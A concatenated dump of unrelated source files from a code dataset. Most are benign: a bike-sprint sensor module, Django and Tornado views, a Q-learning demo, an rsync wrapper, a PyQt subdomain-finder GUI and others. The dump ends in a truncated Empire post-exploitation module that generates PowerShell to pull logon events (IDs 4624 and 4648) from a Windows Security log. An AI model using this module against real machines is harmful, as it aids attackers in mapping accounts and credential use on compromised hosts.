self.sprinter_objects)\n\n @staticmethod\n def create(request):\n sensors = read_sensors()\n #settings = list(Dal.get_user_data(request).bikesettings_set.order_by('position').all())\n settings = list(Settings.manager.get_settings_ordered(request))\n interval = int(request.GET.get('measureInterval', 1000))\n if test_environment:\n return TestSprintObject(settings, sensors, interval)\n return SprintObject(settings, sensors, raspberry_sensors, interval)\n\n\nclass TestSprintObject(ISprintObject):\n def __init__(self, settings, sensors, measure_interval):\n super().__init__()\n self.seed = 2\n self.sprinter_objects = []\n for i in range(len(sensors)):\n if sensors[i]:\n x = settings[i]\n self.sprinter_objects.append(\n MeasureObject(x.distance, x.circumference, \n measure_interval, None, i))\n\n\n def get_data(self, request):\n if self.seed < 10:\n self.seed += 2\n measures = [x.get_measure(int(random.randint(self.seed,self.seed+3)*x.measure_interval/1000))\n for x in self.sprinter_objects] \n \n self.check_finish(request, measures)\n \n return {'data': measures, 'finished': self.sprint_finished}\n\n\nclass SprintObject(ISprintObject):\n def __init__(self, settings, sensors, rs, measure_interval):\n super().__init__()\n self.sprinter_objects = []\n for i in range(len(sensors)):\n if sensors[i]:\n x = settings[i]\n self.sprinter_objects.append(\n MeasureObject(x.distance, x.circumference, \n measure_interval, rs, i))\n\n def get_data(self, request):\n measures = [x.get_measure() for x in self.sprinter_objects] \n \n self.check_finish(request, measures)\n \n return {'data': measures, 'finished': self.sprint_finished}\n\n\n\n#region RIDE\n\nclass IRideObject(metaclass=ABCMeta):\n\n @abstractmethod\n def get_data(self, request):\n pass\n\n \n def dispose(self):\n for x in self.sprinter_objects:\n x.desubscribe()\n\n\n def start(self):\n for x in self.sprinter_objects:\n x.start_timer()\n\n @staticmethod\n def create(request):\n sensors = read_sensors()\n settings = list(Settings.manager.get_settings_ordered(request))\n #settings = list(Dal.get_user_data(request).bikesettings_set.order_by('position').all())\n interval = int(request.GET.get('measureInterval', 1000))\n if test_environment:\n return TestRideObject(settings, sensors, interval)\n return RideObject(settings, sensors, raspberry_sensors, interval)\n\n\nclass TestRideObject(IRideObject):\n def __init__(self, settings, sensors, measure_interval):\n self.seed = 2\n self.sprinter_objects = []\n for i in range(len(sensors)):\n if sensors[i]:\n x = settings[i]\n self.sprinter_objects.append(\n 
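ISprintObject.create() above is a small static-factory pattern: the abstract base owns construction and swaps in a deterministic test double when the code runs off the Raspberry Pi. A stripped-down, hypothetical version of the same shape (names here are invented for illustration):

from abc import ABCMeta, abstractmethod

class ISensorSource(metaclass=ABCMeta):
    @abstractmethod
    def read(self) -> int: ...

    @staticmethod
    def create(test_environment: bool) -> "ISensorSource":
        return FakeSensor() if test_environment else GpioSensor()

class FakeSensor(ISensorSource):
    def read(self) -> int:
        return 42          # deterministic value for tests

class GpioSensor(ISensorSource):
    def read(self) -> int:
        raise NotImplementedError("would touch real hardware here")

assert ISensorSource.create(test_environment=True).read() == 42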
MeasureObject(None, x.circumference, \n measure_interval, None, i))\n\n\n def get_data(self, request):\n if self.seed < 6:\n self.seed += 1\n measures = [x.get_measure(int(random.randint(self.seed,self.seed+3)*x.measure_interval/1000))\n for x in self.sprinter_objects] \n \n return {'data': measures}\n\n\nclass RideObject(IRideObject):\n def __init__(self, settings, sensors, rs, measure_interval):\n self.sprinter_objects = []\n for i in range(len(sensors)):\n if sensors[i]:\n x = settings[i]\n self.sprinter_objects.append(\n MeasureObject(None, x.circumference, \n measure_interval, rs, i))\n\n def get_data(self, request):\n measures = [x.get_measure() for x in self.sprinter_objects]\n return {'data': measures}\n\n","sub_path":"goldsprint/app/goldsprint/sprint_logic.py","file_name":"sprint_logic.py","file_ext":"py","file_size_in_byte":10440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"638232982","text":"# Software License Agreement (BSD License)\n#\n# Copyright (c) 2009, Willow Garage, Inc.\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions\n# are met:\n#\n# * Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the following disclaimer.\n# * Redistributions in binary form must reproduce the above\n# copyright notice, this list of conditions and the following\n# disclaimer in the documentation and/or other materials provided\n# with the distribution.\n# * Neither the name of Willow Garage, Inc. nor the names of its\n# contributors may be used to endorse or promote products derived\n# from this software without specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\n# \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT\n# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS\n# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE\n# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,\n# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,\n# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;\n# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\n# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT\n# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN\n# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\n# POSSIBILITY OF SUCH DAMAGE.\n#\n# Revision $Id: package_header.py 11472 2010-10-12 02:08:53Z kwc $\n# $Author: kwc $\n\nfrom __future__ import print_function\n\nimport os\nimport sys\n\nimport yaml\n\n\ndef generate_repo_header(ctx, repo, stack_files, package_files):\n \"\"\"\n Generate repo.yaml files for MoinMoin Repo macros\n\n @param stack_files: list of stack.yaml files related to this repo\n @return: list of generate files (a single repo.yaml file)\n @rtype: [str]\n \"\"\"\n if repo.name is None:\n sys.stderr.write(\"Invalid repo file (repo.name is None), ignoring\\n\")\n return []\n\n repo_data = {\n 'name': repo.name,\n 'vcs': {\n 'type': repo.type,\n 'uri': repo.uri,\n },\n 'stacks': {},\n 'packages': {},\n }\n for f in stack_files:\n name = os.path.basename(os.path.dirname(f))\n if os.path.isfile(f):\n with open(f) as yaml_f:\n # trim down metadata as repo files can be very large\n d = yaml.load(yaml_f)\n for k in ['depends', 'depends_on', 'repository', 'review_notes', 'review_status', 'vcs']:\n try:\n del d[k]\n except:\n pass\n repo_data['stacks'][name] = d\n\n for f in package_files:\n name = os.path.basename(os.path.dirname(f))\n if os.path.isfile(f):\n with open(f) as yaml_f:\n # trim down metadata as repo files can be very large. This\n # metadata is available elsewhere.\n d = yaml.load(yaml_f)\n for k in ['depends', 'depends_on', 'siblings', 'msgs', 'srvs', 'dependency_tree', 'repository', 'review_notes', 'review_status', 'api_documentation', 'description', 'vcs']:\n try:\n del d[k]\n except:\n pass\n repo_data['packages'][name] = d\n\n filename = os.path.join(ctx.docdir, repo.name, 'repo.yaml')\n filename_dir = os.path.dirname(filename)\n if not os.path.isdir(filename_dir):\n os.makedirs(filename_dir)\n\n with open(filename, 'w') as f:\n print(\"generating repo header %s\"%(filename))\n f.write(yaml.safe_dump(repo_data, default_style=\"'\"))\n\n return [filename_dir]\n","sub_path":"rosdoc_rosorg/src/rosdoc_rosorg/repo_header.py","file_name":"repo_header.py","file_ext":"py","file_size_in_byte":3912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"118515902","text":"#!/usr/bin/env python\n# coding=utf-8\n\nimport base\nfrom config.schema import Relation,User\nimport util.database\n\n\nclass ProjectRelationHandler(base.BaseHandler):\n def get(self):\n self.check()\n session = util.database.Session()\n \n project_id = self.get_secure_cookie(\"projectid\")\n if project_id:\n relationlist = session.query(Relation).filter(Relation.project_id == project_id).order_by(Relation.target_id).all() \n\n userlist = session.query(User).filter(User.project_id == project_id).all()\n else:\n relationlist = None\n userlist = None\n self.render(\"member/projectrelation.html\", userlist = userlist, relationlist = relationlist, error = \"\")\n\n session.close()\n\n\n def post(self):\n self.check()\n 
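Two small modernizations are worth noting for the header generator above: bare yaml.load() without an explicit Loader has been deprecated in PyYAML (safe_load is the drop-in replacement for untrusted files), and each repeated try/del block collapses to dict.pop(key, None). A sketch with a made-up stack entry:

import yaml

raw = """
name: example_stack
depends: [roscpp]
review_status: unreviewed
"""

# safe_load avoids the deprecated (and unsafe) bare yaml.load
d = yaml.safe_load(raw)

# dict.pop(key, None) trims metadata without the try/except del dance
for k in ("depends", "depends_on", "review_notes", "review_status", "vcs"):
    d.pop(k, None)

assert d == {"name": "example_stack"}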
self.redirect(\"/member/projectrelation\")\n\n","sub_path":"src/handlers/member/projectrelation.py","file_name":"projectrelation.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"72166183","text":"class Solution:\r\n def strStr(self, haystack: 'str', needle: 'str') -> 'int':\r\n if haystack == needle:\r\n return 0\r\n for i in range(0, (len(haystack) - len(needle)+1)):\r\n if haystack[i:i + len(needle)] == needle:\r\n return i\r\n return -1\r\n\r\n\r\nmyClass = Solution()\r\nresult = myClass.strStr(\"hello\", \"ll\")\r\nprint(result)\r\n","sub_path":"UnFinished/LeetCode_028_Implement strStr().py","file_name":"LeetCode_028_Implement strStr().py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"548575943","text":"from mTree.microeconomic_system.environment import Environment\nfrom mTree.microeconomic_system.message import Message\nfrom mTree.microeconomic_system.directive_decorators import *\n\n\n@directive_enabled_class\nclass BasicEnvironment(Environment):\n def __init__(self):\n self.institutions = []\n self.agents = []\n self.bundle = []\n self.experiment = None\n self.total_experiments = None\n #self.all_rounds = [] # for each period we store final data here\n\n\n @directive_decorator(\"initialize_rows\")\n def initialize_rows(self, message:Message):\n '''makes the rows of the choices as list of tuples'''\n payload = message.get_payload()\n\n #set the rewards\n reward_A_1 = payload[\"reward_A_1\"]\n reward_A_2 = payload[\"reward_A_2\"]\n reward_B_1 = payload[\"reward_B_1\"]\n reward_B_2 = payload[\"reward_B_2\"]\n num_rows = payload[\"num_rows\"] # number of rows in the bundle\n\n # creates each row and append to bundle\n for i in range(1, num_rows + 1):\n optionA = ([((i / num_rows), reward_A_1), ((((num_rows - i) / num_rows)), reward_A_2), \"A_%d\" % i])\n optionB = ([((i / num_rows), reward_B_1), ((((num_rows - i) / num_rows)), reward_B_2), \"B_%d\" % i])\n self.bundle.append([optionA, optionB]) # append each row to the bundle\n\n self.experiment = payload[\"experiment\"]\n self.total_experiments = payload[\"total_experiments\"]\n self.run = payload[\"run\"]\n self.total_runs = payload[\"total_runs\"]\n\n @directive_decorator(\"send_bundle\")\n def send_bundle(self,message:Message):\n ''' sends bundle from environment to institution'''\n\n #create message to send to institution\n message = Message()\n message.set_sender(self)\n message.set_directive(\"fill_in_rows\")\n payload = {}\n\n #create the payload w/ bundle\n payload[\"bundle\"] = self.bundle\n payload[\"experiment\"] = self.experiment\n payload[\"total_experiments\"] = self.total_experiments\n payload[\"run\"] = self.run\n payload[\"total_runs\"] = self.total_runs\n message.set_payload(payload)\n self.bundle = []\n\n #send to all institutions\n for i in self.institutions:\n self.send(i,message)\n\n\n @directive_decorator(\"initialize_agents\")\n def initialize_agents(self, message: Message):\n '''give each of the agents their attributes and sends the info to institution for data collecting'''\n\n # contains the theta and sd\n payload = message.get_payload()\n #self.theta = payload[\"theta\"]\n #self.sd = payload[\"sd\"]\n\n #make the message to send to each agent\n message = Message()\n message.set_sender(self)\n message.set_directive(\"initialize_agents\")\n message.set_payload(payload)\n\n #send message to all agents\n for agent in 
self.agents:\n self.send(agent, message)\n\n #create message for the institution\n message = Message()\n message.set_sender(self)\n message.set_directive(\"theta_sd\")\n message.set_payload(payload)\n\n #send the theta and delta to the institution for data collection\n for institution in self.institutions:\n self.send(institution,message)\n\n @directive_decorator(\"send_agents\")\n def send_agents(self, message: Message):\n '''Send a list of agents to the institutions'''\n\n #create message to institutions\n message = Message()\n message.set_sender(self)\n message.set_directive(\"fill_in_agents\")\n\n #create the payload with a list of agents\n payload = {}\n payload[\"agents\"] = self.agents\n message.set_payload(payload)\n\n #send msg to the institution\n for i in self.institutions:\n self.send(i,message)\n\n @directive_decorator(\"send_institution\")\n def send_institution(self, message: Message):\n '''Send a list of the institutions to agents '''\n\n #create message\n message = Message()\n message.set_sender(self)\n message.set_directive(\"fill_in_institution\")\n\n #create payload with institutions\n payload = {}\n payload[\"institutions\"] = self.institutions\n message.set_payload(payload)\n\n #send to all agents\n for i in self.agents:\n self.send(i,message)\n\n\n @directive_decorator(\"start_experiment\")\n def start_experiment(self, message: Message):\n '''Start the actual experiment'''\n\n message = Message()\n message.set_sender(self)\n message.set_directive(\"start_experiment\")\n\n #send the message to all institutions\n for i in self.institutions:\n self.send(i,message)\n\n @directive_decorator(\"collect_data\")\n def collect_data(self, message: Message):\n '''tells in institution to send the data to the container'''\n\n #create message\n message = Message()\n message.set_sender(self)\n message.set_directive(\"collect_data\")\n\n #send to all institutions\n for i in self.institutions:\n self.send(i, message)\n\n\n\n\n\n","sub_path":"Holt_Laury Monte Carlo and analysis/basic_envrionment.py","file_name":"basic_envrionment.py","file_ext":"py","file_size_in_byte":5165,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"303006282","text":"import numpy as np\n# R matrix\nR = np.matrix([ [-1,-1,-1,-1,0,-1],\n [-1,-1,-1,0,-1,100],\n [-1,-1,-1,0,-1,-1],\n [-1,0,0,-1,0,-1],\n [-1,0,0,-1,-1,100],\n [-1,0,-1,-1,0,100],])\n# Q matrix\nQ = np.matrix(np.zeros([6,6]))\n# Gamma --> Learning Parameter \ngamma = 0.9\n# initial state (to be chosen at random)\ninital_state = 1\n#this function returns all available action in the state given as an argument \ndef available_action(state):\n current_state_row = R[state,]\n av_act =np.where(current_state_row>=0)[1]\n return av_act\n# get available action in the curretn state\navailable_act = available_action(inital_state)\n# this function choses at random which action is to be performed within the range of all available actions\ndef sample_next_action(available_action_range):\n next_action = int(np.random.choice(available_act, 1))\n return next_action\n# sample next action to be performed \naction = sample_next_action(available_act)\n#this function updated the Q matrix according to the path selected and the @ learning algorithm\ndef update(current_state,action,gamma):\n max_index = np.where(Q[action,] == np.max(Q[action, ]))[1] \n if max_index.shape[0]>1:\n max_index = int(np.random.choice(max_index, size=1))\n else:\n max_index = int(max_index)\n max_value = Q[action, max_index]\n # Q learning 
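Every directive in the environment above repeats the same four lines of Message assembly before the send loop. A small helper collapses that; this is a sketch, not part of the mTree framework, and it assumes only the Message API already used above (set_sender / set_directive / set_payload, delivered via sender.send):

from mTree.microeconomic_system.message import Message  # as imported above

def broadcast(sender, receivers, directive, payload=None):
    # build one message and deliver it to every receiver, exactly as
    # the hand-written directive handlers above do
    message = Message()
    message.set_sender(sender)
    message.set_directive(directive)
    if payload is not None:
        message.set_payload(payload)
    for receiver in receivers:
        sender.send(receiver, message)

# e.g. inside start_experiment():
#   broadcast(self, self.institutions, "start_experiment")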
formula\n Q[current_state, action] = R[current_state, action] + gamma * max_value\n#update Q matrix \nupdate(inital_state,action,gamma)\n#-------- TRAINING -----------\n# train over 10000 iterations (Re-iterate the process above )\nfor i in range(10000):\n current_state = np.random.randint( 0, int(Q.shape[0]))\n available_act = available_action(current_state)\n action = sample_next_action(available_act)\n update(current_state,action,gamma)\n#normalize the trained Q function \nprint(\"Trained Q matrix: \\n\")\nprint(Q / np.max(Q)*100)\n#-------- TESTING -----------\n#goal state = 5\n#best sequence path starting from 2-> 2, 3 ,1 ,5 to gain max rewards\ncurrent_state = 3\nsteps = [current_state]\nwhile current_state!=5:\n next_step_index = np.where(Q[current_state,] == np.max(Q[current_state,]))[1]\n if next_step_index.shape[0] > 1:\n next_step_index = int(np.random.choice(next_step_index, size=1))\n else:\n next_step_index = int(next_step_index)\n steps.append(next_step_index)\n current_state = next_step_index\n# print selected sequence od steps \nprint( \" Selected path: \\n\")\nprint(steps)","sub_path":"shortestpath.py","file_name":"shortestpath.py","file_ext":"py","file_size_in_byte":2511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"485672019","text":"from math import sin, cos, pi\nfrom typing import Union\n\n\n# Type declarations\nclass Move(object):\n def __init__(self, dx: float, dy: float) -> None:\n self.dx = dx\n self.dy = dy\n\n\nclass Rotate(object):\n def __init__(self, degrees: float) -> None:\n self.degrees = degrees\n\n\nclass NoOp(object):\n pass\n\nAction = Union[Move, Rotate, NoOp]\n\n\nclass State(object):\n def __init__(self, x: float, y: float) -> None:\n self.x = x\n self.y = y\n\n def __repr__(self) -> str:\n return 'State({}, {})'.format(self.x, self.y)\n\n\n# Actual code here\ndef update(state: State, action: Action) -> State:\n if isinstance(action, Move):\n return State(state.x + action.dx, state.y + action.dy)\n elif isinstance(action, Rotate):\n s = sin(action.degrees)\n c = cos(action.degrees)\n return State(c * state.x + s * state.y, -s * state.x + c * state.y)\n elif NoOp:\n return state\n\n\ndef main() -> None:\n state = State(0.0, 0.0)\n state = update(state, Move(1.0, -1.0))\n state = update(state, Rotate(pi / 2.0))\n print(state)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"109205748","text":"# SPDX-License-Identifier: Apache-2.0\n#\n# The OpenSearch Contributors require contributions made to\n# this file be licensed under the Apache-2.0 license or a\n# compatible open source license.\n\nimport argparse\nimport logging\nimport sys\n\n\nclass BuildArgs:\n manifest: str\n snapshot: bool\n component: str\n keep: bool\n\n def __init__(self):\n parser = argparse.ArgumentParser(description=\"Build an OpenSearch Bundle\")\n parser.add_argument(\n \"manifest\", type=argparse.FileType(\"r\"), help=\"Manifest file.\"\n )\n parser.add_argument(\n \"-s\",\n \"--snapshot\",\n action=\"store_true\",\n default=False,\n help=\"Build snapshot.\",\n )\n parser.add_argument(\n \"-c\", \"--component\", type=str, help=\"Rebuild a single component.\"\n )\n parser.add_argument(\n \"--keep\",\n dest=\"keep\",\n action=\"store_true\",\n help=\"Do not delete the working temporary directory.\",\n )\n parser.add_argument(\n \"-v\",\n 
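The update above implements the standard tabular Q-learning assignment Q(s,a) ← R(s,a) + γ·max_a' Q(s',a'), where in this room graph the next state equals the chosen action. A compact sketch on plain ndarrays (np.matrix, used in the record, is legacy and makes the row-max clumsier):

import numpy as np

def q_update(Q, R, state, action, gamma=0.9):
    # Q(s, a) <- R(s, a) + gamma * max_a' Q(s', a'), with s' = a
    # (matching the room-graph encoding used above)
    Q[state, action] = R[state, action] + gamma * Q[action].max()

Q = np.zeros((6, 6))
R = np.zeros((6, 6))
R[1, 5] = 100.0
q_update(Q, R, state=1, action=5)
assert Q[1, 5] == 100.0   # terminal reward propagates immediately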
\"--verbose\",\n help=\"Show more verbose output.\",\n action=\"store_const\",\n default=logging.INFO,\n const=logging.DEBUG,\n dest=\"logging_level\",\n )\n\n args = parser.parse_args()\n self.logging_level = args.logging_level\n self.manifest = args.manifest\n self.snapshot = args.snapshot\n self.component = args.component\n self.keep = args.keep\n self.script_path = sys.argv[0].replace(\"/src/build.py\", \"/build.sh\")\n\n def component_command(self, name):\n return \" \".join(\n filter(\n None,\n [\n self.script_path,\n self.manifest.name,\n f\"--component {name}\",\n \"--snapshot\" if self.snapshot else None,\n ],\n )\n )\n","sub_path":"bundle-workflow/src/build_workflow/build_args.py","file_name":"build_args.py","file_ext":"py","file_size_in_byte":1949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"48592995","text":"from django.shortcuts import render, reverse, HttpResponseRedirect\n\nfrom ghostposts.models import GhostPost\nfrom ghostposts.forms import GhostPostForm\n\nhtml= 'index.htm'\n\ndef index(request):\n data = GhostPost.objects.all().order_by('-submission_time')\n return render(request, html, {'data': data})\n\n\ndef add_ghost_post(request):\n if request.method == 'POST':\n form = GhostPostForm(request.POST)\n if form.is_valid():\n data = form.cleaned_data\n GhostPost.objects.create(\n boast_or_roast=data['boast_or_roast'],\n post=data['post'],\n )\n return HttpResponseRedirect(reverse('home'))\n\n form = GhostPostForm()\n return render(request, 'post.htm', {'form': form})\n\ndef boasts(request):\n data = GhostPost.objects.filter(boast_or_roast=True).order_by('-submission_time')\n return render(request, html, {'data': data})\n\ndef roasts(request):\n data = GhostPost.objects.filter(boast_or_roast=False).order_by('-submission_time')\n return render(request, html, {'data': data})\n\ndef likes(request, id):\n post = GhostPost.objects.get(id=id)\n post.up_votes += 1\n post.save()\n return HttpResponseRedirect(reverse('home'))\n\ndef dislikes(request, id):\n post = GhostPost.objects.get(id=id)\n post.down_votes += 1\n post.save()\n return HttpResponseRedirect(reverse('home'))\n\ndef most_liked(request):\n data = GhostPost.objects.order_by('-up_votes')\n return render(request, html, {'data': data})\n\ndef least_liked(request):\n data = GhostPost.objects.order_by('up_votes')\n return render(request, html, {'data': data})\n","sub_path":"ghostposts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"423514237","text":"# very basic terminal emulator in pyqt\n# https://pythonbasics.org/pyqt/\n\nfrom PyQt5 import QtWidgets, uic\nfrom PyQt5.QtCore import pyqtSlot\nfrom PyQt5.QtWidgets import QMessageBox\nfrom PyQt5.QtGui import QIcon\nimport sys\nimport os\nimport subprocess\nfrom sub import main\nimport time\n\n\n\nclass Subdomain(QtWidgets.QMainWindow):\n def __init__(self):\n super(Subdomain, self).__init__()\n uic.loadUi('subUI.ui', self)\n self.setWindowIcon(QIcon('2435355-200.png'))\n self.setWindowTitle('Subdomain Finder')\n # self.lineEdit.returnPressed.connect(self.doCMD)\n # self.pushButtonInstall.clicked.connect(self.onClick)\n self.startBtn.clicked.connect(self.on_startClick)\n self.backBtn.clicked.connect(self.on_backClick)\n self.resetBtn.clicked.connect(self.on_resetClick)\n\n\n @pyqtSlot()\n def on_resetClick(self):\n\n self.url.setText('')\n # self.port.setText('')\n 
self.outPut.setText('')\n\n\n @pyqtSlot()\n def on_backClick(self):\n from startUI import Start\n self.f = Start()\n self.f.show()\n self.hide()\n\n @pyqtSlot()\n def on_startClick(self):\n url=str(self.url.text())\n self.outPut.append('Searching for domain: '+url)\n ans = main(url)\n for a in range(len(ans)):\n\n if a==2:\n for i in ans[2]:\n print(i)\n self.outPut.append(str(i))\n else:\n self.outPut.append(str(ans[a]))\n\n\nif __name__ == '__main__':\n\n app = QtWidgets.QApplication([])\n win = Subdomain()\n win.show()\n sys.exit(app.exec())\n","sub_path":"subUI.py","file_name":"subUI.py","file_ext":"py","file_size_in_byte":1630,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"211685665","text":"# utility\n\nclass Utility:\n @staticmethod\n def gen(it_obj):\n for item in it_obj:\n yield item\n\n @staticmethod\n def print_dict(some_dict):\n for key in Utility.gen(some_dict):\n print ('{} = {}'.format(key, some_dict[key]))\n\n @staticmethod\n def print_client(clientlist):\n for item in Utility.gen(clientlist):\n item.self_print()\n\n @staticmethod\n def port_to_keys(keys_list, port):\n \"\"\" Add '-p port' to a -e params, if port exist \"\"\"\n if (port):\n index = 0\n key_str = '-e \\'ssh -p {}\\''.format(port)\n for item in Utility.gen(keys_list):\n if (item.startswith('-e')):\n index = keys_list.index(item)\n keys_list[index] = key_str\n break\n if (not index):\n keys_list.append(key_str)\n\n return keys_list\n\n @staticmethod\n def rsync_all(data_dict):\n for item in Utility.gen(data_dict['client']):\n keys = list()\n keys.extend(data_dict['keys'])\n\n item.pinger()\n keys = Utility.port_to_keys(keys, item.port)\n item.rsync_cmd(keys, data_dict['host_files'])\n\n #########################Logger section#########################\n\n class rsynclog:\n '''\n Custom logger to store all rsync wrapper actions.\n '''\n\n @staticmethod\n def logger_init(some_str):\n ''' Initialise new logger '''\n import logging\n logger = logging.getLogger(some_str)\n logger.setLevel(logging.INFO)\n logger.setLevel(logging.DEBUG)\n handler = logging.FileHandler('rsyncer.log')\n formatter = logging.Formatter('[%(asctime)s] - %(name)11s - %(levelname)6s : %(message)s',datefmt='%d-%m-%y %H:%M')\n handler.setFormatter(formatter)\n logger.addHandler(handler)\n return logger\n\n @staticmethod\n def info_log(logger, infostr):\n ''' Log info message '''\n logger.info(infostr)\n\n @staticmethod\n def debug_log(logger, infostr):\n ''' Log debug message '''\n logger.debug(infostr)\n\n class helper:\n '''Helper object will raise help messages'''\n\n @staticmethod\n def usage_help():\n print('usage: '\n 'rsyncer.py [/dir file1 file2][-process][-e ssh][username:port@ip:/destination [-pass=PASS]][-PavSzq]\\n'\n 'Runs rsync application with input parameters. For more info go to main_help.')\n\n @staticmethod\n def main_help():\n print('All available keys:\\n'\n '-process If exists raise -process flag for rsync\\n'\n '-pass=[Password] Password for connection to remote host\\n'\n '-e [connection type] Connection type ssh or rsh\\n'\n '-P Analog rsync --partial --progress\\n'\n '-a Archive mode\\n'\n '-v Verbose input\\n'\n '-S Parse argument files\\n'\n '-z Compress data stream\\n'\n '-q Quiet input\\n'\n\n 'Single remoute host can be entered without [...] brackets.\\n'\n 'Multiple remoute hosts should be entered as list in [...] 
brackets.\\n '\n '\\n'\n '!!After [ and before ] brackets spaces are necessary!!\\n'\n '\\n'\n 'Example: \\n'\n 'rsyncer.py -Pa /dir file1 [ username1@remote1 -pass=123 username2@remote2 username3@remote3 -pass=qwe ]\\n'\n 'Valid separators between username and port are: comma, spot, colon (,.:)\\n'\n 'Examples: rsyncer.py /usr root@host\\n'\n ' rsyncer.py /usr/wildcard* file3.avi root,22@hostname:/junk')\n\n @staticmethod\n def connection_type_help():\n print('Something goes wrong. Try -e ssh, -e rsh or use help.')\n\n @staticmethod\n def multiple_host_help():\n print('Something goes wrong. Spaces are necessary after open and before closed brackets.\\n'\n 'For more information use help\\n'\n 'Example: [ username1@remote1 -pass=123 username2@remote2 username3@remote3 -pass=qwe ]')\n\n @staticmethod\n def random_help():\n print('Oops, something goes wrong. Try to use help.')\n","sub_path":"Rsyncer/utility_cls.py","file_name":"utility_cls.py","file_ext":"py","file_size_in_byte":4641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"157315613","text":"#!usr/bin/env python\n# -*- coding:utf-8 -*-\n__author__ = 'fuzc'\n\nimport os\n\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\nSALT_MASTER = '192.168.253.1'\n\nFILE_SERVER = {\n 'http':'%s:8000' %SALT_MASTER.strip(),\n 'salt':SALT_MASTER\n}\n\nFILE_SERVER_BASE_PATH = '/salt/file_center' #存放客户端需要下载的文件\n\nFILE_STORE_PATH = \"%s/var/downloads/\" % BASE_DIR #客户端下载的文件存放目录\n\n#tmp config\nSALT_CLIENT_ID = 1\n\nMQ_CONN = {\n 'host':'192.168.253.1',\n 'port': 5672,\n}\n","sub_path":"saltstack/saltclient/conf/configs.py","file_name":"configs.py","file_ext":"py","file_size_in_byte":527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"307704102","text":"from __future__ import print_function\n\nfrom builtins import object, str\nfrom typing import Dict\n\nfrom empire.server.core.module_models import EmpireModule\nfrom empire.server.utils.module_util import handle_error_message\n\n\nclass Module(object):\n @staticmethod\n def generate(\n main_menu,\n module: EmpireModule,\n params: Dict,\n obfuscate: bool = False,\n obfuscation_command: str = \"\",\n ):\n # read in the common module source code\n script, err = main_menu.modulesv2.get_module_source(\n module_name=module.script_path,\n obfuscate=obfuscate,\n obfuscate_command=obfuscation_command,\n )\n\n if err:\n return handle_error_message(err)\n\n script_end = \"\"\n outputf = params.get(\"OutputFunction\", \"Out-String\")\n\n for option, values in params.items():\n if option.lower() != \"agent\" and option.lower() != \"outputfunction\":\n if values and values != \"\":\n if option == \"4624\":\n script_end += \"$SecurityLog = Get-EventLog -LogName Security; $Filtered4624 = Find-4624Logons $SecurityLog;\"\n script_end += 'Write-Output \"Event ID 4624 (Logon):`n\";'\n script_end += \"Write-Output $Filtered4624.Values\"\n script_end += f\" | {outputf}\"\n script = main_menu.modulesv2.finalize_module(\n script=script,\n script_end=script_end,\n obfuscate=obfuscate,\n obfuscation_command=obfuscation_command,\n )\n return script\n\n if option == \"4648\":\n script_end += \"$SecurityLog = Get-EventLog -LogName Security; $Filtered4648 = Find-4648Logons $SecurityLog;\"\n script_end += 'Write-Output \"Event ID 4648 (Explicit Credential Logon):`n\";'\n script_end += \"Write-Output $Filtered4648.Values\"\n script_end += f\" | {outputf}\"\n script = 
